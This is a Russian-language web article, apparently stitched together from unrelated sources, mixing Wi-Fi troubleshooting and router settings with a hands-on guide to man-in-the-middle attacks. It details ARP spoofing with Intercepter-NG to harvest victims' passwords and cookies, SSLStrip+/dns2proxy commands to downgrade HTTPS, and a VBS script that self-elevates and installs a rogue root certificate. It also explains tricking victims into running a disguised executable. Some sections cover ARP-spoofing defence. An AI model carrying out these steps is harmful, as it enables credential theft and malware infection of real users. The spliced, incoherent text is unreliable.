8 лучших программ для анализа сетевого трафика

Перехват со своего роутера

Для того, чтобы перехватывать трафик в сети интернет, существует специальная техника, называемая, ARP-spoofing, основанная на применении ARP-протокола.

В случае использования последовательности удаленного поиска в интернет-пространстве возможно осуществить типовую удаленную атаку под названием «ложный объект РВС».

На основании анализа безопасности АRP был сделан вывод о том, что посредством перехвата трафика WiFi широковещательного ARP-запроса на производящем атаку хосте внутри данной области можно организовать отправку ложного ARP-ответа с объявлением себя требуемым хостом (роутером). Это позволяет злоумышленникам брать под контроль трафик того хоста, который дезинформировали, и воздействовать по на него по ранее обговариваемой схеме.

Существует некий алгоритм, приводящий к перехвату трафика, состоящий из следующих этапов:

Вопросы и ответы по Wi-Fi в Linux

Почему меняется MAC адрес, даже если не используется программа для этого

Многие современные дистрибутивы настроены постоянно менять MAC адрес. Подробности об этом, а также как отключить или наоборот включить эту функцию смотрите в статье «Как поменять MAC-адрес в Linux, как включить и отключить автоматическую смену (спуфинг) MAC в Linux».

Как узнать, будет ли поддерживаться Wi-Fi карта для аудита Wi-Fi сетей

Самый простой вариант, это выбрать адаптер из данного списка: «USB Wi-Fi адаптеры с поддержкой режима монитора и беспроводных инъекций».

Если вы хотите определить, поддерживает режим монитора и беспроводные инъекции другой адаптер, не включённый в список, то изучите «Как определить, какой Wi-Fi адаптер подойдёт для Kali Linux».

Современные Wi-Fi карты для беспроводного аудита

Двухдиапазонные беспроводные адаптеры с поддержкой режима монитора и беспроводными инъекциями, а также с поддержкой стандарта AC:

  • Alfa AWUS1900 (чипсет: Realtek RTL8814AU)
  • TRENDnet TEW-809UB (чипсет: Realtek RTL8814AU)
  • ASUS USB-AC68 (чипсет: Realtek RTL8814AU)
  • Alfa AWUS036ACH (чипсет: Realtek RTL8812AU)
  • Alfa AWUS036AC (чипсет: Realtek RTL8812AU)
  • ASUS USB-AC56 (чипсет: Realtek RTL8812AU)

Любой из этих адаптеров будет актуален ещё много лет.

Как увидеть, что происходит с беспроводными интерфейсами

Следующие команды помогут вам увидеть абсолютно всё, что происходит за сценой во время, например, неудачных подключений.

Вы можете использовать вывод следующих команд для решения любых проблем с Wi-Fi.

Следующая команда в реальном времени будет показывать всё, что происходит в вашей системе — например, при подключении беспроводного адаптера, она покажет, какой драйвер загружен или какие проблемы возникли. Также будут выведены сообщения от приложений:

journalctl -f

Следующая команда расскажет о всё, что происходит на уровне — как IP адреса присваиваются интерфейсам и какие маршруты прописываются в системе:

ip monitor

А эта команда покажет все события, связанные с беспроводными сетевыми интерфейсами:

iw event

Эти три команды — важнейший источник информации для разрешения неочевидных проблем. Изучайте их вывод или предоставьте вывод этих команд если вы пытаетесь совместно разрешить вашу проблему с Wi-Fi.

Как узнать, сколько трафика было передано

ip -s -h a show <ИНТЕРФЕЙС>

Почему в Wi-Fi на 5 ГГц недоступны каналы между 64 и 100

С помощью команды

iw list

можно посмотреть, какие частоты поддерживает ваша Wi-Fi карта.

Пример вывода:

Ещё один пример:

Набор каналов чуть различается, но в любом случае частоты в диапазоне каналов 64-100 полностью недоступны. То есть они даже не отключены, а как бы просто не существуют.

Возможно вам тоже любопытно, почему существует разрыв между каналом 64 и 100 в Wi-Fi 5 ГГц?

Ответ 1:

В диапазоне 5,35–5,46 ГГц перечислены различные применения, включая «Воздушную радионавигацию». Здесь будут каналы с 68 по 96. Очевидно, они не хотят, чтобы оборудование с поддержкой Wi-Fi было включено даже случайно, что может помешать навигации самолёта.

Ответ 2:

Эти каналы используются совместно с метеорологическим радаром. Маршрутизатор, использующий эти каналы, должен проверить наличие метеорологического радара. Если обнаружен метеорологический радар, маршрутизатор должен переключиться на другой канал, на котором нет метеорологического радара. Я не помню, как быстро маршрутизатор должен прекратить использовать канал. Это может быть 10 минут.

Если маршрутизатор переключает каналы WiFi, клиенты обычно не переключаются. Все, что было подключено, теряет связь. Я думаю, что контроллер может переключить клиентов на новый канал до того, как старый отключится, но опять же я не уверен.

Это может быть корпоративное оборудование. Потребители не могут себе этого позволить.

Итак

Отсутствие упоминания канала в списке поддерживаемых частот, а также следующая запись означают, что ваше Wi-Fi устройство не способно работать на этом канале:

5340 MHz  (disabled)

Вы также можете увидеть записи с «no IR»:

5180 MHz  (22.0 dBm) (no IR)

Флаг no-ir (no-initiating-radiation) переводится как «отсутствие инициирующего излучения», то есть канал в принципе может использоваться, но не может первым отправить никакие данные, то есть он будет задействован только если получит от роутера beacon (маяки) на этих частотах.

Также можно увидеть записи с «no IR, radar detection»:

5260 MHz  (22.0 dBm) (no IR, radar detection)

Перехват трафика wifi с телефона

Использование телефона хакером как средства взлома системы клиента происходит редко. Обычно это требуется при выходе в интернет в метро для избегания просмотра рекламных роликов. Однако необходимо найти того человека, у которого оплачена данная подписка.

Для того, чтобы организовать перехват сообщений через сеть wifi с телефона, необходимо выполнить ряд последовательных действий:

  1. Подготовить устройство с версией Андроид выше 4.0;
  2. Установить на ПК новую версию программы Fiddler2;
  3. Произвести установку специальных библиотек генерации совместимого с андроид сертификата безопасности;
  4. Экспортировать с Fiddler2 сертификат безопасности;
  5. Добавить сертификат в доверенные путем последовательного перехода от Settings > Security > Install from SD card»;
  6. Запустить Fiddler2;
  7. Разрешить в настройках администратора внешние коннекты;
  8. Прописать в сетевых настройках телефона адрес машины с программы Fiddler2;
  9. Открыть браузер гугл на андроиде;
  10. Ввести запрос с полученным от Fiddler2 ответом.

Перехват куки и паролей.

Начнем с классического перехвата паролей и куки, в принципе процесс как в статье перехват паролей по Wi Fi и перехват куки по Wi Fi но перепишу его заново, с уточнениями.

Антивирусы кстати часто могут палить такие штуки и сводить перехват данных по Wi FI

Для начала вообще определитесь, что вам необходимо получить от жертвы ? Может вам необходимы пароли от социальных сетей, а может просто от сайтов. Может вам достаточно куки чтобы зайти под жертвой и сразу что либо сделать, либо вам необходимы пароли для будущего сохранения. А вам необходимо анализировать в дальнейшем изображения просмотренные жертвой и некоторые странички, или вам не нужен этот хлам? Вы знаете что жертва уже вошла на сайт (при переходе уже авторизирована) или ещё только будет вводить свои данные ?

Если нет необходимости получать картинки с посещаемых ресурсов, части медиафайлов и видеть некоторые сайты сохраненные в файл html отключите в Settings — Ressurection. Это слегка уменьшит нагрузку на роутер.

Что можно активировать в Settings — если вы подключены через ethernet кабель нужно активировать Spoof Ip/mac. Так же активируйте Cookie killer (помогает сбросить куки, чтобы у жертвы вышло с сайта). Cookie killer относится к Атаке SSL Strip поэтому не забываем активировать.

Так же лучше если будет активирован Promiscious (беспорядочный режим) который позволяет улучшить перехват, но не все модули его поддерживают. Extreme mode (экстримальный режим ) можно обойтись без него. С ним порою перехватывает больше портов, но появляется и лишняя информация + нагрузка.

Во первых выбираем сверху интерфейс через который вы подключены к интернету и тип подключения Wi-fi либо Ethernet если подключены через кабель к роутеру.

В режиме Scan Mode правой кнопкой мыши по пустому полю и нажимаем Smart scan. Отсканируются все устройства в сети, осталось добавить нужные жертвы в Add nat.

А можно и поставить один любой IP, перейти в settings — expert mode и поставить галочку на Auto ARP poison, в таком случае программа будет добавлять каждого кто подключен и подключится к сети.

Нам остается перейти в Nat mode.

Нажимаем configure mitms , здесь нам пригодится SSL mitm и SSL strip.

SSL mitm позволяет как раз заниматься перехватом данных, хотя и на него реагируют многие браузеры предупреждая жертву.

SSL Strip позволяет чтобы у жертвы переключалось с Https защищенного протокола на HTTP , а так же чтобы работал cookie killer.

Больше нам ничего не требуется,жмем start arp poison (значок радиации) и ждем активности жертвы.

В разделе password mode нажмите пкм и Show coolies. Потом можно на cookie нажам пкм и перейти на full url.

Кстати, если жертва сидит в соц сетях есть вероятность что его активная переписка появится в Messengers mode.

Что может Intercepter-NG

Главная задача Intercepter-NG – выполнение атаки человек-посередине. В практическом смысле, атака человек-посередине (её ещё называют атакой посредника) заключается в возможности просматривать передаваемые другими пользователями данные в локальной сети. Среди этих данных могут быть логины и пароли от сайтов. Также передаваемые данные можно не только анализировать и сохранять, но и изменять.

Чтобы описать техническую суть этой атаки, представьте себе локальную сеть. Такой локальной сетью могут быть несколько компьютеров в вашей квартире, которые подключены к роутеру

При этом неважно, подключены они по проводу или по Wi-Fi. Роутер получает запросы от компьютеров, перенаправляет их, например, в Интернет, а полученные ответы возвращает обратно компьютерам, отправившим запросы

В данной ситуации роутер является шлюзом.

Благодаря атаке, называемой ARP спуфингом, компьютер начинает считать шлюзом не роутер, а компьютер атакующего. Атакующий получает запросы от «жертвы» и передаёт их в пункт назначения (например, запрашивает содержимое веб-сайта в Интернете), получив ответ от пункта назначения, он направляет его «жертве». В этой ситуации атакующий становится посредником – отсюда другое название атаки человек-посередине – «атака посредника». Для реализации атаки ARP спуфинг необязательно понимать её детали. Но если вам интересно, почему это происходит, то в вы найдёте подробное описание этого процесса.

Атакующий получает доступ к передаваемым данным и может, например, извлекать из этих данных пароли и сообщения. Процесс анализа передаваемых данных называется сниффингом. В процессе сниффинга Intercepter-NG умеет:

  • Перехватывать логины и пароли для входа на веб-сайты
  • Восстанавливать переданные данные (файлы)
  • Перехватывать сообщения некоторых мессенджеров
  • Показывать посещённые пользователем адреса

Кроме передачи данных, возможно их изменение, внедрение в код открываемых страниц JavaScript и принудительная загрузка пользователю файла.

Всё это прекрасно работает только для незашифрованных данных. Если данные зашифрованы (HTTPS), то их невозможно проанализировать без дополнительных действий.

Прежде чем подключиться к веб-сайту, компьютер обращается к DNS (серверу имён), чтобы узнать его IP адрес. Intercepter-NG умеет подменять ответы DNS (делать DNS спуфинг), что позволяет перенаправлять «жертву» на фальшивые копии сайтов для последующих атак.

Это далеко не все возможности программы. С другими возможностями мы познакомимся далее в этой инструкции.

Частичный обход HSTS

Зашифрованный трафик, доля которого постоянно возрастает, не даёт нам заглянуть во внутрь передаваемой информации. Связка из SSLStrip+ и dns2proxy поможет нам решить эту проблему и даже частично обойти HSTS.

Ставим необходимые зависимости (показано на примере BlackArch, залогинен под рутом):

pacman -S python2-service-identity python2-pcapy

Начнём с добавления новых правил роутинга на сервере VPN :

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 2000
iptables -t nat -A PREROUTING -p tcp --destination-port 1194 -j REDIRECT --to-port 2000
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

Скачиваем и запускаем SSLStrip+:

git clone https://github.com/singe/sslstrip2.git
cd sslstrip2/
nohup python2 ./sslstrip.py -l 2000 &

Скачиваем и запускаем dns2proxy:

cd ..
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
nohup python2 dns2proxy.py &

Теперь опять можно запустить Net-Creds, в этот раз пойманных паролей будет значительно больше:

net-creds -i tun0

Как видно по следующим скриншотам, yandex.ru, vk.com, google.com и другие очень хорошо поддаются данной атаке:

Обнуление куки для провоцирования ввода логина и пароля

Куки могут со временем быть обновлены, и мы не сможем вновь зайти со старыми куки на сайт. Поэтому нам хотелось бы получить логин и пароль. Но пока куки действуют, пользователю не нужно вводить учётные данные каждый раз, поэтому хотя «жертва» и заходит на сайт, мы не можем их перехватить.

Чтобы не ждать, пока истечёт срок действия куки и на целевом компьютере понадобиться ввести учётные данные, мы можем ускорить этот процесс – обнулить куки. Для этого имеется специальная опция: Cookie Killer.

Cookie Killer — обнуляет кукиз, тем самым принуждая пользователя повторно авторизоваться — ввести логин и пароль, чтобы атакующий мог их перехватить. Функция Cookie Killer работает и для SSL соединений. Имеются черные (misc\ssl_bl.txt) и белые списки (misc\ssl_wl.txt). В них можно исключить или напротив жестко указать IP адреса или домены, к которым следует или не следует применять SSL MiTM. При указании extra ssl port нет необходимости указывать тип read\write, достаточно указать номер порта. Весь трафик пишется в ssl_log.txt.

О том, как воспользоваться этой опцией, показано в этом видео:

Примечание: во время тестирования мне не удалось заставить работать Cookie Killer, ни в виртуальной машине, ни с отдельным реальным компьютером.

Дополнительную информацию о различных атаках вы найдёте в видео:

Внедрение HTTP:

Принудительная загрузка файлов:

Код упоминаемого в видео .vbs файла:

Dim str

str = "-----BEGIN CERTIFICATE-----MIICFzCCAYACCQCEGK7JTRLonzANBgkqhkiG9w0BAQUFADBQMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxDjAMBgNVBAcTBVRleGFzMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTMwNDAzMTE1OTUzWhcNMjEwNjIwMTE1OTUzWjBQMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxDjAMBgNVBAcTBVRleGFzMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKM+co6MfVJQCrnW1CAMEnPYgbthTZk7hyXf5Qd4ZYJOrQUtF959bjOleDEyy/swA1qezLtH+w9v/Jnmnufd0Ui78ZWMvjlKk3nlagCzSK/1qa/wVtJTFbnr+k1i1GQuMCadYujEDy6MC7IGtiefpjr3JmpMwIlKyTRMmYwsWZ0rAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEARVtNikEQ0Oiy7hw/Y/tysM/IQl6a0XDxcuTxT8o6WJD42KwKTzbgcSQQggp4LXwFNrw2BC9ISiinxXYuBuPMATTrs5LrCeGcogYJFOhUd0YcG/0qjgy60IoFeexWc7iyqpNAG+AQcG0HlXfNan9U1jFyb/YCQuo9gpgl4EVyjr0=-----END CERTIFICATE-----"

Set objFSO=CreateObject("Scripting.FileSystemObject")


outFile="1.crt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write str
objFile.Close
Set WshShell = WScript.CreateObject("WScript.Shell")
  If WScript.Arguments.length = 0 Then
  Set ObjShell = CreateObject("Shell.Application")
  ObjShell.ShellExecute "wscript.exe", """" & _
  WScript.ScriptFullName & """" &_
  " RunAsAdministrator", , "runas", 1
  End if

Dim objShell
Set objShell = WScript.CreateObject ("WScript.shell")
objShell.run "certutil -addstore -f Root 1.crt"
Set objShell = Nothing

Если вам нужен только сам сертификат, то вы его найдёте в папке программы Intercepter-NG, файл misc\server.crt

Функция X-Scan:

FATE (фальшивые обновления и фальшивый веб-сайт):

Получение пароля от iCloud при помощи Intercepter-NG:

Ещё инструкции по Intercepter-NG

  • Описание большинства опций Intercepter-NG вы найдёте на странице: https://kali.tools/?p=3101

Далее даётся техническое описание ARP спуфинга.

Http inject (подсунуть жертве файл).

Ммм, довольно сладкая опция.

Можно подсунуть жертве чтобы она скачала файл. Нам остаётся надеяться что жертва запустит файл. Для правдоподобности, можно проанализировав какие сайты посещает жертва, подсунуть что то вроде обновления.

К примеру если жертва на VK назовите файл vk.exe . возможно жертва запустит решив что это полезное что.

  • Configure HTTP injection.
  • В первой ячейке что нам необходимо подменить ( предпочтение .js) и во втором поле вылезет javascript.
  • в 3м введите 1
  • Создайте в блокноте файл, назовите его например alert.js (js расширение) и введите в нём к примеру следующее – alert (‘Download the update %domain%.’) , можно вместо Download the update ввести что то своё, на что выйдет фантазия.
  • Нажимаете add и открываете сделанный выше скрипт.
  • Ставьте галочку на «Inject forced download» и выбираете файл который хотите подсунуть жертве.
  • Жмете ок, переходите в Nat mode и активируете SSL Strip.
  • Добавьте в жертву в Nat и жмите Starting arp poison.
  • Остается ожидать пока жертва скачает файл.

Гостевая сеть

Если у вас какая-то общественная Wi-Fi сеть, возможно даже не защищённая паролем, для которой нужно установить ограничение максимальной скорости, то лучше всего использовать функцию «Гостевой сети».

Дело в том, что помимо основной сети можно запустить гостевую сеть, которая будет полностью изолирована от основной сети. И для гостевой сети задать ограничение по скорости. И это ограничение будет действовать для всех устройств, которые будут подключены к гостевому Wi-Fi.

Как это сделать? Зайдите в настройки роутера, меню «Гостевая сеть».

На этой странице можно:

Разрешить гостевым пользователям доступ к моей локальной сети. Если эта функция включена, пользователи смогут подключаться к устройствам в локальной сети роутера.

Разрешить гостевым пользователям доступ к USB-хранилищу. Если эта функция включена, пользователи смогут подключиться к USB-хранилищу. Но данная функция доступна только на роутерах с USB-портом.

Изоляция гостевой сети. Если эта функция включена, пользователи не смогут взаимодействовать между собой.

Контроль пропускной способности гостевой сети. Это именно то, что нам нужно. Если эта функция включена, будут применяться правила контроля пропускной способности гостевой сети. То есть, можно задать уже описанным мною способом Исходящую и Входящую пропускную способность для устройств, подключенных к Гостевой сети.

Укажу, например, минимальное значение Единицу. А максимальное – 2048 Килобит в секунду, то есть 2 мегабита.

Вы можете указать частоту, на которой будет работать гостевая сеть: 2,4 или 5 ГГц. Но это только если у вас двухдиапазонный роутер, как у меня.

Гостевая сеть. Включить или выключить функцию гостевой сети.

Имя сети – это имя самой гостевой сети. Введите значение длиной до 32 символов. Именно так её будут видеть гостевые пользователи.

Максимальное количество гостевых пользователей. До 32-х. Установите желаемое количество.

Защита. Здесь можно отключить или настроить защиту гостевой сети. Её можно отключить – тогда гостевые пользователи смогут подключаться к Wi-Fi без пароля.

Или включить и настроить WPA/WPA2 защиту, как в защите беспроводного режима основной сети.

Время доступа. Установите время возможного доступа к сети. То есть, когда она будет доступна. Я думаю разберётесь, здесь не сложно.

Не забудьте сохранить внесённые настройки.

Это были способы ограничения пропускной способности подключаемых к роутеру устройств и, таким способом, контроля раздаваемого им Интернет трафика.

Возможен ли перехват со скрытой сети

Абсолютное большинство пользователей придерживается мнения, что достигнуть высшего уровня безопасности wi-fi можно путем задания пароля для входа. Однако на практике оказалось, что данное мнение ошибочно.

Согласно проведенным исследованиям, был констатирован факт установления соединений между клиентом и доступной точкой и манипулированием трафиком согласования в сетях с WPA2 и WPA.

Механизм действий злоумышленников таков, что он реализует атаку посредника между клиентом и доступной точкой путем нарушения порядка приемки и отправки сообщений. В результате этого ему становится доступным частичное манипулирование отправкой сообщений и синхронизацией.

Тем не менее, защита WPA2 в настоящее время считается наиболее популярной. Это связано с тем, что большинство пользователей некомпетентны в области программирования, а также подобные хакерские атаки на хостинги обычных пользователей являются редкостью.

Linux

Речь пойдет не только про Kali Linux, а вообще про скрипты для Unix систем как основных в тестировании на проникновение. Ниже перечислю основные интересные скрипты для работы. Жаждущие устроить перехват с актуальными данными используют именно эти утилитки. Все остальное – потеря времени.

  • mitmAP – создает точку доступа, устраивает понижение HTTPS и хватает все идущее через нее. Работает на ура, далеко не все сайты устоят. ВКонтактик опускает руки. Скрипт задает вам логичные вопросы по шагам. Ясно дело на басурманском языке, но и люди, знакомые с Линуксом, не абы кто. Так что легко разберетесь. Комментарии излишни. Собирает данные в текст и файлы для Wireshark (которым, к слову, тоже можно поанализировать все пакеты в сети).
  • WiFi-Pumpkin – еще одна точка доступа, но уже с графическим интерфейсом. Функционал покруче интерцептора. Тоже лежит на Гите.

За сим заканчиваю этот коротки обзор. Как видите – даже сейчас и даже при шифровании возможны утечки данных. Так что рекомендую быть бдительными в открытых сетях, а весь трафик пускать через свои VPN сервисы, дабы злоумышленники не могли нанести вам ущерб. Всем хорошего дня!

Как обещал продолжаю о программе Intercepter-ng.

Сегодня уже будет обзор на практике.

Предупреждение : менять настройки или бездумно жать настройки не стоит. В лучшем случае может просто не работать или вы повесите Wi Fi. А у меня был случай что сбросились настройки роутера. Так что не думайте что всё безобидно.

И даже при таких же настройках как у меня не значит что всё будет гладко работать. В любом случае для серьезных дел придется изучать работу всех протоколов и режимов.

Другие новости по теме:

  • Протоколы безопасности wi-fiПолучить несанкционированный доступ к беспроводным сетям, гораздо проще, чем к стационарному подключению. Основная причина – это осуществление радиосвязи, перехват трафика через которую вполне
  • Как защитить домашний Wi Fi роутер от взлома?Советов о том, как защитить домашний Wi Fi роутер очень много и кроме шутки: смазать все ядом курары, есть вполне разумные и недорогие способы создания безопасности собственному пребыванию в
  • Взлом пароля вай файВзлом пароля вай фай Взлом пароля вай фай необходим для доступу к бесплатному трафику. Удобно пользоваться услугой, когда оплачивает ее сосед, тем более, что доказать это сегодня проблематично.
  • Скачать программу вай фай взломМощный инструмент сетевого анализа – Wireshark Поговорим об анализаторе сетевых протоколов Wireshark. Это мощнейший инструмент для изучения сетевых возможностей, самое необходимое подспорье для
  • Взлом сети

Опасно ли пользоваться открытым Wi-Fi

Интернет-доступ через Wi-Fi в настоящее время очень популярен. Wi-Fi есть во многих квартирах, на рабочих местах

При использовании беспроводного доступа важно поддерживать безопасность своей Точки Доступа (смотрите статью «Как защитить Wi-Fi роутер от взлома»).

В настоящее время также очень популярными стали публичные сети Wi-Fi. Они есть в ресторанах, спортивных залах, в торговых центрах, в метро, в отелях, в частных больницах и поликлиниках, в апартаментах и кондоминиумах — их можно найти практически везде, где собирается довольно много людей.

У этих сетей есть особенность — часто это открытые сети Wi-Fi для подключения к которым не требуется пароль. Есть ли какие-то дополнительные правила безопасности для работы с такими сетями?

Да, при использовании открытой Wi-Fi сетью нужно хорошо понимать, что:

  • все данные передаются радиоволнами, то есть в отличие от провода, к которому далеко не каждый может получить доступ, радиоволны могут перехватываться кем угодно, кто находится в диапазоне досягаемости
  • в открытых сетях данные не зашифрованы

С первым пунктом, думаю, всё понятно: если кто-то с компьютером и Wi-Fi картой находится достаточно близкой, то он может захватывать и сохранять весь трафик, передаваемый между беспроводной Точкой Доступа и всеми её клиентами.

Что касается второго пункта, то нужно пояснить по поводу шифрования передаваемых данных. Например, если вы открываете какой-либо сайт, который использует протокол HTTPS (то есть безопасный протокол), например сайт https://hackware.ru/, то передаваемые данные на этот сайт и с этого сайта к вам зашифрованы. Если вы открываете сайт работающий по протоколу HTTP, то все передаваемые данные: какие страницы вы посетили, какие комментарии оставили, какие кукиз получил ваш веб-браузер — эти данные передаются в незашифрованном виде. Так вот, если вы подключены к Wi-Fi Точке Доступа которая требует ввод пароля, то передаваемый трафик шифруется ещё раз. То есть даже если вы открываете сайт на протоколе HTTPS, то передаваемый трафик шифруется два раза (первый раз при передаче от веб-браузера до веб-сервера и в обратном направлении, второй раз при передаче от вашего устройства и до Точки Доступа, а также в обратном направлении). А если вы открываете сайт на протоколе HTTP, то передаваемый трафик шифруется только один раз (только при передаче от вашего устройства до Точки Доступа и обратно).

Но открытые точки доступа не шифруют трафик. Из этого следует: если вы используете открытую точку доступа и открываете сайт, работающий на протоколе HTTP, значит ваши данные передаются в открытом виде и кто угодно рядом с вами может их захватить и сохранить. Если вы открываете сайт на протоколе HTTPS, то эти данные зашифрованы, тем не менее, всё равно видно, какие именно сайты вы открывали (хотя не видно, какие именно страницы и что вы вводили, например, какие оставили комментарии).

Итак: нужно помнить, что открытые беспроводные сети подвержены перехвату информации.

Далее я покажу пример перехвата данных, из которого вам станет понятнее, что именно может увидеть злоумышленник.

Профилактика ARP-спуффинга

В настоящее время ARP-спуффинг является распространенной атакой. Для того чтобы защитить свою сеть, необходимо выполнить ряд не связанных между собой действий:

  • Применять для организации надежной защиты специальные программы, в частности, arpwatch, BitCometAntiARP и ряд аналогичных им;
  • Проводить организацию VLAN’ов;
  • Использовать PPTP и PPPoE;
  • Произвести настройку в локальной сети шифровального трафика IPSec ( в том случае, когда он открыт).

Также известны ситуации, когда защита от вклинивания и перехвата вай фай трафика осуществляются механизмом Dynamic ARP Inspection (Protection). Он заключается в том, что пользователь сам задает такие порты коммутатора, которые он считает достоверными, и наоборот.

Надежный порт — это порт с подключенными клиентами.

Все заданные недостоверные порты проверяются механизмом, в то время как исходящая информация от достоверных портов не отбрасывается.

Перехват ARP-запросов и ARP-ответов от подозрительных портов осуществляется коммутатором перед отправкой. Также происходит сравнение MAC-адресов и IP-адресов на их соответствие с учетом статистических записей и баз данных привязки DHCP.

Для того, чтобы включить защиту, необходимо в коммутаторах вызвать команду «Switch(config)# ip arp inspection vlan 1».

Чтобы осуществить настройку доверенного порта, нужно ввести «Switch(config)# interface gigabitethernet1/0/1» и «Switch(config-if)# ip arp inspection trust».

При отсутствии коммутатора, призванного решить проблемы атак, можно закачать программу arpwatch. Принцип ее действия основан на отслеживании соответствия IP- и MAC-адресов. В случае обнаружения аномальных ситуаций производит их фиксацию в системном логе.

Обратите внимание! К главному недостатку данной и аналогичных программ защиты следует отнести тот факт, что им необходимо осуществлять работу на защищаемых хостах или роутере, который переводит на защищаемую сеть. Поскольку маршрутизаторы управляются не всегда посредством Linux, то есть являются коммутатором уровня под номером три, то для его защиты следует получать от него ARP-таблицу по SNMP и производить анализ данных на специальной машине

Поскольку маршрутизаторы управляются не всегда посредством Linux, то есть являются коммутатором уровня под номером три, то для его защиты следует получать от него ARP-таблицу по SNMP и производить анализ данных на специальной машине.

Ограничение скорости передачи по Wi-Fi сети

Чтобы ограничить скорость по Wi-Fi сети для всех устройств:

Зайдите в настройки роутера. Перейдите на вкладку “DHCP”, и посмотрите, какой диапазон IP адресов там задан. Нас интересуют поля «Начальный IP-адрес» и «Конечный IP-адрес». Можете их запомнить или скопировать.

После этого, перейдите на вкладку «Контроль пропускной способности». Здесь нужно создать новое правило контроля пропускной способности. Для этого нажмите кнопку «Добавить».

Отметьте галочкой «Включить». И укажите диапазон IP-адресов, которые мы смотрели на вкладке “DHCP”, в соответствующем поле.

Поле Диапазон портов оставляем пустым.

Протокол – выбираем “ВСЕ”.

Приоритет. По умолчанию стоит 5, можно так и оставить.

Укажите максимальную исходящую и входящую пропускную способность. Минимальное значение, обычно ставиться минимально допустимое – 1. Максимальное, я поставлю 10 Мегабит. То есть – 10 240 Килобит в секунду.

Такой же устанавливаю и Входящую пропускную способность. Это та скорость, с которой устройство будет получать информацию с интернета. Но можно указать как большее, так и меньшее значение.

Теперь, ко ВСЕМ подключаемым к роутеру устройствам будет применено правило, которое мы создали в настройках управления пропускной способностью. А именно входящая и исходящая скорость будет ограничена 10 (десятью) мегабитами.

Как убедиться, что Wifi безопасен

Использование протокола WPA2 создает более высокую защиту файлов от пользователей, решивших произвести перехват данных через wifi

Однако в целях предосторожности стоит время от времени проверять безопасность собственного вай-фай. Для этого необходимо воспользоваться пошаговой инструкцией:

  1. зайти в раздел по изменению настроек роутера;
  2. посмотреть на количество подключенных клиентов;
  3. сравнить известные подключения;
  4. обнаружить неизвестные и запретить им доступ.

Данный подход основан на том, что для каждого подключенного устройства отображается его реальный уникальный MAC- и IP-адрес.

Таким образом, в данной статье подробно рассказывается, как через общий вай фай перехватить данные, а также каким способом можно защитить устройства (iphone, андроид-технику, компьютеры). При наличии выбора типа сети лучше отдавать предпочтение домашним.

Использование публичной точки доступа чревато для клиентов потерей данных. В общем случае злоумышленнику для организации взлома нужно иметь при себе компьютерное устройство, адаптер вай-фай для режима мониторинга и пакет утилит aircrack-ng.

Подключение кабеля или переходника с VGA на HDMI − как это сделать правильно

Оцените статью
Рейтинг автора
5
Материал подготовил
Андрей Измаилов
Наш эксперт
Написано статей
116
Добавить комментарий